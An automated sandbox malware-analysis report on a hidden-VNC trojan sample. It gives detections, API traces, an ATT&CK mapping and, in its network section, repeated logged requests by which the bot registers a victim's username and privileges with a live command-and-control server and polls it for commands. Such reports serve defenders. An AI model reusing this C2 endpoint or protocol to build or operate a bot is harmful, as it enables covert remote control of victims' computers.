Edit tour

Windows Analysis Report
Leprechaun Hvnc.bin.exe

Overview

General Information

Sample name:Leprechaun Hvnc.bin.exe
Analysis ID:1457367
MD5:e497f871973ee2d1e1a42680efa369e3
SHA1:a694ee791e04b0f60ed48e304a694faec9437e4d
SHA256:3f58c4d27a63e7cac54346db50bde86788e6706e6f730cbff29862284f2150cb
Tags:exeLeprechaunVNC
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Machine Learning detection for sample
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • Leprechaun Hvnc.bin.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\Leprechaun Hvnc.bin.exe" MD5: E497F871973EE2D1E1A42680EFA369E3)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Leprechaun Hvnc.bin.exeAvira: detected
Source: Leprechaun Hvnc.bin.exeReversingLabs: Detection: 44%
Source: Leprechaun Hvnc.bin.exeJoe Sandbox ML: detected
Source: Leprechaun Hvnc.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Leprechaun Hvnc.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global trafficHTTP traffic detected: GET /c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges=Admin HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: unknownTCP traffic detected without corresponding DNS query: 65.20.106.109
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeCode function: 0_2_004919D0 GetProcessHeap,HeapAlloc,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,InternetReadFile,GetProcessHeap,HeapAlloc,HeapReAlloc,InternetReadFile,0_2_004919D0
Source: global trafficHTTP traffic detected: GET /c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges=Admin HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: global trafficHTTP traffic detected: GET /c2.php?action=fetchcommand&botid= HTTP/1.1Accept: text/*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'Host: 65.20.106.109
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/Y.;S
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=1
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=2
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=4
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000145A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=8
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=D
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=GPDR
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=I
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=P
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=W
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=ndemandconnroutehelper.dll
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=fetchcommand&botid=oQ
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges
Source: Leprechaun Hvnc.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal60.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeMutant created: \Sessions\1\BaseNamedObjects\LeprechaunHvnc
Source: Leprechaun Hvnc.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Leprechaun Hvnc.bin.exeReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: Leprechaun Hvnc.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Leprechaun Hvnc.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeCode function: 0_2_00491680 LoadLibraryW,GetProcAddress,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,VerSetConditionMask,VerifyVersionInfoW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,0_2_00491680
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000141E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeCode function: 0_2_00491680 LoadLibraryW,GetProcAddress,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,VerSetConditionMask,VerifyVersionInfoW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,0_2_00491680
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeCode function: 0_2_004919D0 GetProcessHeap,HeapAlloc,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,InternetReadFile,GetProcessHeap,HeapAlloc,HeapReAlloc,InternetReadFile,0_2_004919D0
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\Leprechaun Hvnc.bin.exeCode function: 0_2_004912A0 GetProcessHeap,GetStdHandle,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,IsUserAnAdmin,lstrcpyW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,GetProcessHeap,HeapAlloc,RegCreateKeyW,RegSetKeyValueA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameA,lstrcmpW,GetProcessHeap,HeapAlloc,GetEnvironmentVariableA,lstrcatA,lstrcatA,CreateDirectoryA,lstrcatA,CopyFileA,RegCreateKeyW,RegSetKeyValueA,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_004912A0
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
Account Discovery
Remote Desktop ProtocolData from Removable Media11
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
System Owner/User Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1457367 Sample: Leprechaun Hvnc.bin.exe Startdate: 14/06/2024 Architecture: WINDOWS Score: 60 10 Antivirus / Scanner detection for submitted sample 2->10 12 Multi AV Scanner detection for submitted file 2->12 14 Machine Learning detection for sample 2->14 5 Leprechaun Hvnc.bin.exe 1 12 2->5         started        process3 dnsIp4 8 65.20.106.109, 49712, 49715, 49719 CP-ASDE United States 5->8

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Leprechaun Hvnc.bin.exe45%ReversingLabsWin32.Trojan.Generic
Leprechaun Hvnc.bin.exe100%AviraTR/Downloader.Gen
Leprechaun Hvnc.bin.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://65.20.106.109/c2.php?action=fetchcommand&botid=P0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=80%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=40%Avira URL Cloudsafe
http://65.20.106.109/Y.;S0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=10%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=W0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=20%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=GPDR0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=ndemandconnroutehelper.dll0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=I0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=D0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&Privileges0%Avira URL Cloudsafe
http://65.20.106.109/c2.php?action=fetchcommand&botid=oQ0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://65.20.106.109/c2.php?action=fetchcommand&botid=8Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000145A000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=GPDRLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/Y.;SLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=1Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=WindowsLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=PLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=ndemandconnroutehelper.dllLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=2Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013BE000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=4Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=WLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001449000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.000000000142E000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=fetchcommand&botid=ILeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://65.20.106.109/c2.php?action=installnewbot&Username=user&OsVersion=Windows%2010&PrivilegesLeprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.00000000013FF000.00000004.00000020.00020000.00000000.sdmp, Leprechaun Hvnc.bin.exe, 00000000.00000002.3339875794.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
